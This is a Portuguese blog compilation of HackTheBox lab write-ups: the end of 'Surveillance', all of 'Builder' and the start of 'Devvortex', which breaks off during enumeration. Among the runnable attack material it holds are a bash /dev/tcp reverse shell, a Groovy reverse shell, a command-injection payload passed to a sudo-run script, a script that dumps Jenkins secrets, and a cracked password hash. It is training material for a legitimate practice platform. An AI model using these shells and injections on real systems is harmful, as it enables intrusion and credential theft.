Com o repositório devidamente clonado em nossa máquina executaremos da seguinte forma:

┌──(root�kali)-[/home/kali/hackthebox/machines-linux/surveillance/CVE-2023-26035]
└─# python3 exploit.py -t http://127.0.0.1:8081 -ip 10.10.14.174 -p 9002
[>] fetching csrt token
[>] recieved the token: key:f3dbd44dfe36d9bf315bcf7b9ad29a97463a4bb7,1702432913
[>] executing...
[>] sending payload..
[!] failed to send payload

Mesmo com a mensagem de falha no envio do payload temos o seguinte retorno em nosso pwncat:

┌──(root�kali)-[/home/kali/hackthebox/machines-linux/surveillance]
└─# pwncat-cs -lp 9002
[21:01:10] Welcome to pwncat 🐈!                                                                                                 __main__.py:164
[21:01:55] received connection from 10.129.44.183:43356                                                                               bind.py:84
[21:02:04] 10.129.44.183:43356: registered new host w/ db                                                                         manager.py:957
(local) pwncat$                                                                                                                                 
(remote) zoneminder@surveillance:/usr/share/zoneminder/www$ ls -lah /home/zoneminder/
total 20K
drwxr-x--- 2 zoneminder zoneminder 4.0K Nov  9 12:46 .
drwxr-xr-x 4 root       root       4.0K Oct 17 11:20 ..
lrwxrwxrwx 1 root       root          9 Nov  9 12:46 .bash_history -> /dev/null
-rw-r--r-- 1 zoneminder zoneminder  220 Oct 17 11:20 .bash_logout
-rw-r--r-- 1 zoneminder zoneminder 3.7K Oct 17 11:20 .bashrc
-rw-r--r-- 1 zoneminder zoneminder  807 Oct 17 11:20 .profile

Conseguindo assim shell como o usuário zoneminder. Mais uma vez iremos realizar uma enumeração.

Através do comando sudo conseguimos visualizar um comando que o usuário zoneminder consegue executar com permissões de root:

(remote) zoneminder@surveillance:/usr/share/zoneminder/www$ sudo -l
Matching Defaults entries for zoneminder on surveillance:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User zoneminder may run the following commands on surveillance:
    (ALL : ALL) NOPASSWD: /usr/bin/zm[a-zA-Z]*.pl *

O usuário pode executar qualquer script que esteja no diretório /usr/bin que inicie seu nome com zm e finalize com a extensão .pl que é referente a linguagem perl. Também podemos passar paramêtros.

Aqui estão todos os scripts que conseguimos executar como usuário root:

(remote) zoneminder@surveillance:/home/zoneminder$ ls -alh /usr/bin/zm*.pl
-rwxr-xr-x 1 root root  43K Nov 23  2022 /usr/bin/zmaudit.pl
-rwxr-xr-x 1 root root  13K Nov 23  2022 /usr/bin/zmcamtool.pl
-rwxr-xr-x 1 root root 6.0K Nov 23  2022 /usr/bin/zmcontrol.pl
-rwxr-xr-x 1 root root  26K Nov 23  2022 /usr/bin/zmdc.pl
-rwxr-xr-x 1 root root  35K Nov 23  2022 /usr/bin/zmfilter.pl
-rwxr-xr-x 1 root root 5.6K Nov 23  2022 /usr/bin/zmonvif-probe.pl
-rwxr-xr-x 1 root root  19K Nov 23  2022 /usr/bin/zmonvif-trigger.pl
-rwxr-xr-x 1 root root  14K Nov 23  2022 /usr/bin/zmpkg.pl
-rwxr-xr-x 1 root root  18K Nov 23  2022 /usr/bin/zmrecover.pl
-rwxr-xr-x 1 root root 4.8K Nov 23  2022 /usr/bin/zmstats.pl
-rwxr-xr-x 1 root root 2.1K Nov 23  2022 /usr/bin/zmsystemctl.pl
-rwxr-xr-x 1 root root  13K Nov 23  2022 /usr/bin/zmtelemetry.pl
-rwxr-xr-x 1 root root 5.3K Nov 23  2022 /usr/bin/zmtrack.pl
-rwxr-xr-x 1 root root  19K Nov 23  2022 /usr/bin/zmtrigger.pl
-rwxr-xr-x 1 root root  45K Nov 23  2022 /usr/bin/zmupdate.pl
-rwxr-xr-x 1 root root 8.1K Nov 23  2022 /usr/bin/zmvideo.pl
-rwxr-xr-x 1 root root 6.9K Nov 23  2022 /usr/bin/zmwatch.pl
-rwxr-xr-x 1 root root  20K Nov 23  2022 /usr/bin/zmx10.pl

Foi necessário descobrir o que cada script faz, no entanto, fica mais simples quando olhamos esta documentação.

O foco foi tentar explorar scripts que podemos inserir dados, ou seja, scripts que aceitem parâmetros do usuário.

Outro ponto importante é que se for inserido o payload e ele for executado no inicialmente o mesmo será feito como usuário zoneminder.

Precisamos que nosso payload seja carregado e executado posteriormente, de forma que seja executado pelo usuário root.

Dentre os scripts nos temos o zmupdate.pl que é responsável por checar se existem updates para o ZoneMinder e ira executar migrations de atualização. No entanto o mesmo realiza um backup do banco utilizando o mysqldump, comando esse que recebe input do usuário (usuário e senha) e executa comor root.

Inicialmente vamos criar um arquivo chamado rev.sh com o seguinte conteúdo:

#!/bin/bash
sh -i 5<> /dev/tcp/10.10.14.229/9001 0<&5 1>&5 2>&5

E localmente em nossa máquina vamos utilizar o pwncat para ouvir na porta 9001:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/surveillance]
└─# pwncat-cs -lp 9001
[17:14:01] Welcome to pwncat 🐈!                                                              __main__.py:164

Agora iremos inserir no input do script o comando '$(/home/zoneminder/rev.sh)' que será salvo como variável exatamente da forma como esta, sem executar, devido as aspas simples que faz com que os caracteres especiais sejas lidos literalmente.

Executaremos da seguinte forma:

(remote) zoneminder@surveillance:/home/zoneminder$ sudo /usr/bin/zmupdate.pl --version=1 --user='$(/home/zoneminder/rev.sh)' --pass=ZoneMinderPassword2023

Initiating database upgrade to version 1.36.32 from version 1

WARNING - You have specified an upgrade from version 1 but the database version found is 1.26.0. Is this correct?
Press enter to continue or ctrl-C to abort : 

Do you wish to take a backup of your database prior to upgrading?
This may result in a large file in /tmp/zm if you have a lot of events.
Press 'y' for a backup or 'n' to continue : y
Creating backup to /tmp/zm/zm-1.dump. This may take several minutes.

A senha do banco é a mesma que conseguimos anteriormente. E assim temos o seguinte retorno em nosso pwncat:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/surveillance]
└─# pwncat-cs -lp 9001
[17:14:01] Welcome to pwncat 🐈!                                                              __main__.py:164
[17:18:06] received connection from 10.129.42.193:39340                                            bind.py:84
[17:18:10] 0.0.0.0:9001: normalizing shell path                                                manager.py:957
[17:18:12] 0.0.0.0:9001: upgrading from /usr/bin/dash to /bin/bash                             manager.py:957
[17:18:14] 10.129.42.193:39340: registered new host w/ db                                      manager.py:957
(local) pwncat$                                                                                              
(remote) root@surveillance:/home/zoneminder# id
uid=0(root) gid=0(root) groups=0(root)

Conseguimos shell como root! Podemos buscar a root flag!

(remote) root@surveillance:/home/zoneminder# ls -a /root
.  ..  .bash_history  .bashrc  .cache  .config  .local  .mysql_history  .profile  root.txt  .scripts  .ssh
(remote) root@surveillance:/home/zoneminder# cat /root/root.txt 
4e69a27f8fc2279a0a149909c8ff2af4

Um ponto interessante agora que estamos como usuário root e visualizar nos processos como foi executado o comando de mysqldump:

(remote) root@surveillance:/home/zoneminder# ps aux | grep mysqldump
root        3035  0.0  0.0   2888  1064 pts/3    S+   22:18   0:00 sh -c mysqldump -u$(/home/zoneminder/rev.sh) -p'ZoneMinderPassword2023' -hlocalhost --add-drop-table --databases zm > /tmp/zm/zm-1.dump

Como planejamos o valor foi mantido inicialmente, somente na segunda execução que interpretou o caracter especial executando o comando.

E assim finalizamos a máquina Surveillence!

HackTheBox - Writeup Builder [Retired]

Guilherme Martins — Sat, 27 Apr 2024 16:04:44 +0000

Hackthebox

Neste writeup iremos explorar uma máquina linux de nível medium chamada Builder que aborda as seguintes vulnerabilidades e técnicas de exploração

CVE-2024-23897 (Jenkins Arbitrary File Read)
Sensitive Data Exposure

Recon e user flag

Iremos iniciar realizando uma varredura utilizando o nmap para visualizar as portas abertas em nosso alvo:



┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/builder]
└─# nmap -sV --open -Pn 10.129.220.88
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-13 12:15 EST
Nmap scan report for 10.129.220.88
Host is up (0.26s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http    Jetty 10.0.18
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Podemos ver que existem duas portas abertas em nosso alvo, a porta 22 do ssh e a porta 8080 que roda um Jetty na versão 10.0.18. O Jetty é um servidor web feito em java.

Ao acessar a porta 8080 pelo navegador temos a seguinte página:

Se trata de um Jenkins na versão 2.441. O jenkins é uma aplicação feita em java com foco em automação no desenvolvimento de software, realiza ações como build, test e deploy de aplicações.

Podemos notar que é preciso permissões e um usuário para conseguimos acesso a algumas funcionalidades do jenkins, como visualizar histórico de builds, lista os nodes (que possui somente 1 node built in que é nosso alvo).
Também podemos listar os usuários, que no caso temos somente o usuário jennifer:

Também conseguimos listar as credenciais:

Conseguimos visualizar este conteúdo pelo acesso anônimo estar habilitado.
Outro ponto importante é que notamos que a REST API do jenkins esta habilitada também:

Todos estes pontos combinam com uma vulnerabilidade recente do Jenkins, a CVE-2024-23897 que se trata de um Arbitrary File Read na versão 2.441 e anteriores.

Esta vulnerabilidade ocorre devido a uma má sanitização de um input via CLI, que é utilizado através da REST API do jenkins. Ocorre em uma lib chamada args4j é utilizada para parsear argumentos via CLI. Existe uma feature que substitui o caracter @ seguido pelo path de um arquivo por um argumento com o conteúdo desse arquivo, o que nos permite ler arquivos no servidor.

No jenkins em nosso alvo conseguimos baixar o .jar que permitirá a comunicação com o jenkins.
Vamos realizar o download da seguinte forma:



┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/builder]
└─# wget http://10.129.220.88:8080/jnlpJars/jenkins-cli.jar
--2024-02-13 12:20:57--  http://10.129.220.88:8080/jnlpJars/jenkins-cli.jar
Connecting to 10.129.220.88:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3623400 (3.5M) [application/java-archive]
Saving to: ‘jenkins-cli.jar’

jenkins-cli.jar                          100%[=================================================================================>]   3.46M   547KB/s    in 8.6s    

2024-02-13 12:21:06 (413 KB/s) - ‘jenkins-cli.jar’ saved [3623400/3623400]

Para explorar a vulnerabilidade executamos o seguinte comando:



┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/builder]
└─# java -jar jenkins-cli.jar -s http://10.129.220.88:8080/ -http connect-node "@/etc/passwd" | cut -d '\No' -f1
cut: the delimiter must be a single character
Try 'cut --help' for more information.
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin: No such agent "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin" exists.
root:x:0:0:root:/root:/bin/bash: No such agent "root:x:0:0:root:/root:/bin/bash" exists.
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin: No such agent "mail:x:8:8:mail:/var/mail:/usr/sbin/nologin" exists.
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin: No such agent "backup:x:34:34:backup:/var/backups:/usr/sbin/nologin" exists.
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin: No such agent "_apt:x:42:65534::/nonexistent:/usr/sbin/nologin" exists.
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin: No such agent "nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin" exists.
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin: No such agent "lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin" exists.
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin: No such agent "uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin" exists.
bin:x:2:2:bin:/bin:/usr/sbin/nologin: No such agent "bin:x:2:2:bin:/bin:/usr/sbin/nologin" exists.
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin: No such agent "news:x:9:9:news:/var/spool/news:/usr/sbin/nologin" exists.
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin: No such agent "proxy:x:13:13:proxy:/bin:/usr/sbin/nologin" exists.
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin: No such agent "irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin" exists.
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin: No such agent "list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin" exists.
jenkins:x:1000:1000::/var/jenkins_home:/bin/bash: No such agent "jenkins:x:1000:1000::/var/jenkins_home:/bin/bash" exists.
games:x:5:60:games:/usr/games:/usr/sbin/nologin: No such agent "games:x:5:60:games:/usr/games:/usr/sbin/nologin" exists.
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin: No such agent "man:x:6:12:man:/var/cache/man:/usr/sbin/nologin" exists.
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin: No such agent "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin" exists.
sys:x:3:3:sys:/dev:/usr/sbin/nologin: No such agent "sys:x:3:3:sys:/dev:/usr/sbin/nologin" exists.
sync:x:4:65534:sync:/bin:/bin/sync: No such agent "sync:x:4:65534:sync:/bin:/bin/sync" exists.

ERROR: Error occurred while performing this command, see previous stderr output.

Conseguimos o retorno do /etc/passwd, podemos colocar o resultado em um arquivo para filtrar a saída:



┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/builder]
└─# awk -F 'No such agent' '{print $1}' passwd                      
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin: 
root:x:0:0:root:/root:/bin/bash: 
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin: 
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin: 
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin: 
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin: 
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin: 
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin: 
bin:x:2:2:bin:/bin:/usr/sbin/nologin: 
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin: 
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin: 
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin: 
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin: 
jenkins:x:1000:1000::/var/jenkins_home:/bin/bash: 
games:x:5:60:games:/usr/games:/usr/sbin/nologin: 
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin: 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin: 
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync

Podemos notar que existem dois usuários, root e jenkins. A home do root é /root e a home do usuário jenkins é /var/jenkins_home.

Com isso conseguimos buscar a user flag:



┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/builder]
└─# java -jar jenkins-cli.jar -s http://10.129.220.88:8080/ -http connect-node "@/var/jenkins_home/user.txt"          

ERROR: No such agent "aea470ff3badab8504db49aa7e1d9e34" exists.

Escalação de privilégios e root flag

Agora que temos como ler arquivos podemos buscar por arquivos importantes que podem nos dar credenciais ou informações sensíveis.
Utilizando a documentação do jenkins conseguimos encontrar arquivos importantes, um deles é o /var/jenkins_home/users/users.xml que possui informações de usuários do jenkins:



┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/builder]
└─# java -jar jenkins-cli.jar -s http://10.129.220.88:8080/ -http connect-node "@/var/jenkins_home/users/users.xml"

<?xml version='1.1' encoding='UTF-8'?>: No such agent "<?xml version='1.1' encoding='UTF-8'?>" exists.
      <string>jennifer_12108429903186576833</string>: No such agent "      <string>jennifer_12108429903186576833</string>" exists.
  <idToDirectoryNameMap class="concurrent-hash-map">: No such agent "  <idToDirectoryNameMap class="concurrent-hash-map">" exists.
    <entry>: No such agent "    <entry>" exists.
      <string>jennifer</string>: No such agent "      <string>jennifer</string>" exists.
  <version>1</version>: No such agent "  <version>1</version>" exists.
</hudson.model.UserIdMapper>: No such agent "</hudson.model.UserIdMapper>" exists.
  </idToDirectoryNameMap>: No such agent "  </idToDirectoryNameMap>" exists.
<hudson.model.UserIdMapper>: No such agent "<hudson.model.UserIdMapper>" exists.
    </entry>: No such agent "    </entry>" exists.

ERROR: Error occurred while performing this command, see previous stderr output.

Iremos adicionar o resultado em um arquivo para uma melhor leitura:



┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/builder]
└─# awk -F 'No such agent' '{print $1}' users.xml 
<?xml version='1.1' encoding='UTF-8'?>: 
      <string>jennifer_12108429903186576833</string>: 
  <idToDirectoryNameMap class="concurrent-hash-map">: 
    <entry>: 
      <string>jennifer</string>: 
  <version>1</version>: 
</hudson.model.UserIdMapper>: 
  </idToDirectoryNameMap>: 
<hudson.model.UserIdMapper>: 
    </entry>:

Essa informação é importante porque aqui descobrimos o diretório com as informações do usuário jennifer, que o jenkins cria com um número randomico: jennifer_12108429903186576833

Descobrimos assim a conteúdo do arquivo que contém as informações do usuário:



┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/builder]
└─# java -jar jenkins-cli.jar -s http://10.129.220.88:8080/ /var/jenkins_home/users/jennifer_12108429903186576833/config.xml
...
...

Conseguimos visualizar melhor filtrando em um arquivo:



┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/builder]
└─# awk -F 'No such agent' '{print $1}' jennifer-config.xml 
<hudson.tasks.Mailer_-UserProperty plugin="mailer@463.vedf8358e006b_">: 
    <hudson.search.UserSearchProperty>: 
      <roles>: 
    <jenkins.security.seed.UserSeedProperty>: 
      </tokenStore>: 
    </hudson.search.UserSearchProperty>: 
      <timeZoneName></timeZoneName>: 
  <properties>: 
    <jenkins.security.LastGrantedAuthoritiesProperty>: 
      <flags/>: 
    <hudson.model.MyViewsProperty>: 
</user>: 
    </jenkins.security.ApiTokenProperty>: 
      <views>: 
        <string>authenticated</string>: 
    <org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.200.vb_9327d658781">: 
<user>: 
          <name>all</name>: 
  <description></description>: 
      <emailAddress>jennifer@builder.htb</emailAddress>: 
      <collapsed/>: 
    </jenkins.security.seed.UserSeedProperty>: 
    </org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>: 
    </hudson.model.MyViewsProperty>: 
      <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash"/>: 
          <filterQueue>false</filterQueue>: 
    <jenkins.security.ApiTokenProperty>: 
      <primaryViewName></primaryViewName>: 
      </views>: 
    </hudson.model.TimeZoneProperty>: 
    <com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@1319.v7eb_51b_3a_c97b_">: 
    </hudson.model.PaneStatusProperties>: 
    </hudson.tasks.Mailer_-UserProperty>: 
        <tokenList/>: 
    <jenkins.console.ConsoleUrlProviderUserProperty/>: 
        </hudson.model.AllView>: 
      <timestamp>1707318554385</timestamp>: 
          <owner class="hudson.model.MyViewsProperty" reference="../../.."/>: 
  </properties>: 
    </jenkins.model.experimentalflags.UserExperimentalFlagsProperty>: 
    </com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>: 
    <hudson.security.HudsonPrivateSecurityRealm_-Details>: 
      <insensitiveSearch>true</insensitiveSearch>: 
          <properties class="hudson.model.View$PropertyList"/>: 
    <hudson.model.TimeZoneProperty>: 
        <hudson.model.AllView>: 
    </hudson.security.HudsonPrivateSecurityRealm_-Details>: 
      <providerId>default</providerId>: 
      </roles>: 
    </jenkins.security.LastGrantedAuthoritiesProperty>: 
    <jenkins.model.experimentalflags.UserExperimentalFlagsProperty>: 
    <hudson.model.PaneStatusProperties>: 
<?xml version='1.1' encoding='UTF-8'?>: 
  <fullName>jennifer</fullName>: 
      <seed>6841d11dc1de101d</seed>: 
  <id>jennifer</id>: 
  <version>10</version>: 
      <tokenStore>: 
          <filterExecutors>false</filterExecutors>: 
    <io.jenkins.plugins.thememanager.ThemeUserProperty plugin="theme-manager@215.vc1ff18d67920"/>: 
      <passwordHash>#jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a</passwordHash>:

E assim conseguimos o email jennifer@builder.htb e a hash da senha do usuário $2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a

Vamos utilizar o john the ripper para quebrar essa hash:



┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/builder]
└─# john -w=/usr/share/wordlists/rockyou.txt jennifer-hash                                                                   
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
princess         (?)     
1g 0:00:00:00 DONE (2024-02-14 17:12) 3.030g/s 109.0p/s 109.0c/s 109.0C/s 123456..liverpool
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Conseguimos a senha do usuário jennifer, agora podemos logar na interface do jenkins:

O jenkins permite que seja executado scripts groovy através da sua interface pelo script console:

Aqui podemos executar comandos no node do jenkins, que em nosso caso é nosso alvo. Podemos inclusive pegar um shell com o seguinte script:



String host='10.10.16.25'; int port=4444; String cmd='bash'; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Dessa forma vamos conseguir acesso somente como o usuário jenkins.
No entanto, conforme enumeramos inicialmente existe uma credencial de sistema com o nome root. Através do groovy podemos listar todas as credenciais do jenkins com o seguinte script:



// From https://www.dennisotugo.com/how-to-view-all-jenkins-secrets-credentials/
import jenkins.model.*
import com.cloudbees.plugins.credentials.*
import com.cloudbees.plugins.credentials.impl.*
import com.cloudbees.plugins.credentials.domains.*
import com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey
import org.jenkinsci.plugins.plaincredentials.StringCredentials
import org.jenkinsci.plugins.plaincredentials.impl.FileCredentialsImpl

def showRow = { credentialType, secretId, username = null, password = null, description = null ->
println("${credentialType} : ".padLeft(20) + secretId?.padRight(38)+" | " +username?.padRight(20)+" | " +password?.padRight(40) + " | " +description)
}

// set Credentials domain name (null means is it global)
domainName = null

credentialsStore = Jenkins.instance.getExtensionList('com.cloudbees.plugins.credentials.SystemCredentialsProvider')[0]?.getStore()
domain = new Domain(domainName, null, Collections.<DomainSpecification>emptyList())

credentialsStore?.getCredentials(domain).each{
if(it instanceof UsernamePasswordCredentialsImpl)
showRow("user/password", it.id, it.username, it.password?.getPlainText(), it.description)
else if(it instanceof BasicSSHUserPrivateKey)
showRow("ssh priv key", it.id, it.passphrase?.getPlainText(), it.privateKeySource?.getPrivateKey()?.getPlainText(), it.description)
else if(it instanceof StringCredentials)
showRow("secret text", it.id, it.secret?.getPlainText(), '', it.description)
else if(it instanceof FileCredentialsImpl)
showRow("secret file", it.id, it.content?.text, '', it.description)
else
showRow("something else", it.id, '', '', '')
}

return

E assim temos uma chave privada:

Vamos salvar o conteúdo em um arquivo chamado id_rsa_root e alterar sua permissão para 600, pois chaves privadas precisam ter uma permissão mais restritiva para que serem utilizadas:



┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/builder]
└─# chmod 600 id_rsa_root

Testando a chave privada como usuário root em nosso alvo conseguimos o acesso:



┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/builder]
└─# ssh -i id_rsa_root root@10.129.244.76
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-94-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

  System information as of Wed Feb 14 10:50:05 PM UTC 2024

  System load:              0.2177734375
  Usage of /:               66.0% of 5.81GB
  Memory usage:             33%
  Swap usage:               0%
  Processes:                247
  Users logged in:          0
  IPv4 address for docker0: 172.17.0.1
  IPv4 address for eth0:    10.129.244.76
  IPv6 address for eth0:    dead:beef::250:56ff:fe96:9588


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


Last login: Mon Feb 12 13:15:44 2024 from 10.10.14.40

E assim conseguimos a root flag:



root@builder:~# ls -alh
total 32K
drwx------  5 root root 4.0K Feb 14 22:47 .
drwxr-xr-x 18 root root 4.0K Feb  9 15:45 ..
lrwxrwxrwx  1 root root    9 Apr 27  2023 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.1K Oct 15  2021 .bashrc
drwx------  2 root root 4.0K Apr 27  2023 .cache
drwxr-xr-x  3 root root 4.0K Apr 27  2023 .local
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-rw-r-----  1 root root   33 Feb 14 22:47 root.txt
drwx------  2 root root 4.0K Feb  8 11:24 .ssh
root@builder:~# cat root.txt 
229275386e7300b9ad9425a630fa815c

Finalizando a máquina Builder !

HackTheBox - Writeup Devvortex [Retired]

Guilherme Martins — Sat, 27 Apr 2024 15:49:00 +0000

Hackthebox

Neste writeup iremos explorar uma máquina do hackthebox linux de leve easy chamada Devvortex. A máquina aborda as seguintes vulnerabilidades e técnicas:

Enumeração de subdominios
Análise e exploração de vulnerabilidade na CMS Joomla (CVE-XXX)
Crackeando senhas
Privilege Escalation CVE-2023-1326

Enumeração e user flag

Iremos iniciar realizando uma varredura no host alvo a procura de portas abertas, para isso vamos utilizar o nmap:

┌──(root㉿kali)-[/home/…/hackthebox/machines-linux/unobtainium/kubernetes]
└─# nmap -sV --open -Pn 10.129.56.108
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-25 14:06 EST
Nmap scan report for 10.129.56.108
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.38 seconds

Podemos notar que existem duas portas abertas, a 22 referente ao ssh e a porta 80 que esta rodando um nginx que é um servidor web e proxy reverso.

Acessando o IP pela porta navegador somos redirecionados para http://devvortex.htb, vamos adicionar em nosso /etc/hosts para conseguirmos o acesso ao mesmo.

Uma vez adicionado temos a seguinte página web:

No entanto, não encontramos nenhum vetor de exploração inicialmente. Vamos continuar o recon realizando uma enumeração de subdomínios. Para isso vamos utilizr o wfuzz que é um fuzzing.
O comando abaixo ira utilizar uma wordlist para buscar por subdomínios, removendo do retorno os status code 404 e 302:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/devvortex]
└─# wfuzz -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -H "Host: FUZZ.devvortex.htb" --hc 404,302 --hw 356 -t 100 10.129.54.142
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.129.54.142/
Total requests: 207630

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000797:   200        501 L    1581 W     23221 Ch    "dev"

Total time: 588.6878
Processed Requests: 207630
Filtered Requests: 207629
Requests/sec.: 352.6996

Com isso descobrimos um novo subdomínio chamado dev.devvortex.htb.
Precisamos adicionar em nosso /etc/hosts para conseguir o acesso via navegador.

E ao acessar o novo subdomínio temos o seguinte conteúdo:

O mesmo parece ser similar ao domínio principal. A fim de buscar mais informações iremos realizar uma enumeração de diretórios e endpoints utilizando desta vez o gobuster:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/devvortex]
└─# gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://dev.devvortex.htb/ -k
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://dev.devvortex.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Timeout:                 10s
===============================================================
2023/11/28 08:29:01 Starting gobuster in directory enumeration mode
===============================================================
/.bashrc              (Status: 403) [Size: 162]
/.cvs                 (Status: 403) [Size: 162]
/.bash_history        (Status: 403) [Size: 162]
/.cvsignore           (Status: 403) [Size: 162]
/.forward             (Status: 403) [Size: 162]
/.history             (Status: 403) [Size: 162]
/.htaccess            (Status: 403) [Size: 162]
/.htpasswd            (Status: 403) [Size: 162]
/.listing             (Status: 403) [Size: 162]
/.perf                (Status: 403) [Size: 162]
/.ssh                 (Status: 403) [Size: 162]
/.passwd              (Status: 403) [Size: 162]
/.rhosts              (Status: 403) [Size: 162]
/.profile             (Status: 403) [Size: 162]
/.subversion          (Status: 403) [Size: 162]
/.svn                 (Status: 403) [Size: 162]
/.web                 (Status: 403) [Size: 162]
/administrator        (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/administrator/]
/api                  (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/api/]
/cache                (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/cache/]
/cli                  (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/cli/]
/components           (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/components/]
/home                 (Status: 200) [Size: 23221]
/images               (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/images/]
/includes             (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/includes/]
/language             (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/language/]
/layouts              (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/layouts/]
